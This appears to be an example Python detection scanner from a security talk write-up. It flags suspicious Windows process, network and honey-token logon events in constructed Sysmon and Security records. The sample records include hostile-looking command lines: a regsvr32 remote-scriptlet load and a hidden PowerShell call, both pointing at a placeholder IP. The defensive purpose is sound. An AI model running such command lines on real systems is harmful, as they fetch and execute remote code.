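As an added example (not the speaker's code or any tool he mentions), the detection patterns the talk lists (long or IP-bearing PowerShell command lines, script hosts spawned by Office, mshta and regsvr32-with-remote-SCT launches, system binaries beaconing out, and a honey-token account showing up in a 4648 logon) implemented as a small scanner over constructed event records. Field names follow Sysmon events 1 and 3 and Security event 4648; the sample records, the honey account name and the 400-character threshold are assumptions.

```python
"""Detection checks for behaviors named in the talk, over constructed Sysmon (1/3) and Security (4648) records."""
import re

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
NO_NETWORK_BINARIES = {"notepad.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe"}  # should never beacon out
HONEY_ACCOUNTS = {"svc_backup_admin"}  # constructed honey-token account name, never used legitimately
IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
LONG_CMDLINE = 400  # assumed threshold; tune to the environment's baseline

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def check_event(ev):
    """Return the alert strings raised by one event record (a dict)."""
    alerts = []
    eid = ev.get("EventID")
    if eid == 1:  # Sysmon process creation
        image, parent = basename(ev["Image"]), basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        if parent in OFFICE_PARENTS and image in SCRIPT_CHILDREN:
            alerts.append(f"office-child: {parent} spawned {image}")
        if image == "powershell.exe" and len(cmd) > LONG_CMDLINE:
            alerts.append("powershell-long-cmdline")
        if image == "powershell.exe" and IPV4.search(cmd):
            alerts.append("powershell-ip-literal")
        if image == "mshta.exe":
            alerts.append("hta-launched")
        if image == "regsvr32.exe" and re.search(r"/i:https?://", cmd, re.I):
            alerts.append("regsvr32-remote-sct")
    elif eid == 3:  # Sysmon network connection
        image = basename(ev["Image"])
        if image in NO_NETWORK_BINARIES:
            alerts.append(f"unexpected-network: {image} -> {ev['DestinationIp']}")
    elif eid == 4648:  # Security: logon attempted with explicit credentials
        if ev.get("TargetUserName", "").lower() in HONEY_ACCOUNTS:
            alerts.append(f"honeytoken-used: {ev['TargetUserName']} from {ev.get('IpAddress')}")
    return alerts

def scan(events):
    hits = {}  # event index -> alerts, only for events that raised at least one
    for i, ev in enumerate(events):
        alerts = check_event(ev)
        if alerts:
            hits[i] = alerts
    return hits

OFFICE = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
SAMPLE_EVENTS = [  # constructed records, not real telemetry
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": OFFICE, "CommandLine": "cmd.exe /c start"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c " + "$v=$v+1;" * 50 + "http://203.0.113.10/"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe", "CommandLine": "mshta.exe launcher.hta"},
    {"EventID": 1, "Image": r"C:\Windows\System32\regsvr32.exe", "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "regsvr32.exe /s /n /u /i:http://203.0.113.10/x.sct scrobj.dll"},
    {"EventID": 3, "Image": r"C:\Windows\System32\notepad.exe", "DestinationIp": "203.0.113.10"},
    {"EventID": 3, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "DestinationIp": "203.0.113.10"},
    {"EventID": 4648, "TargetUserName": "svc_backup_admin", "IpAddress": "10.0.0.55"},
    {"EventID": 4648, "TargetUserName": "jsmith", "IpAddress": "10.0.0.55"},
]
```

Running `scan(SAMPLE_EVENTS)` flags the first five records and the honey-token logon, and stays quiet on the browser connection and the ordinary user's 4648.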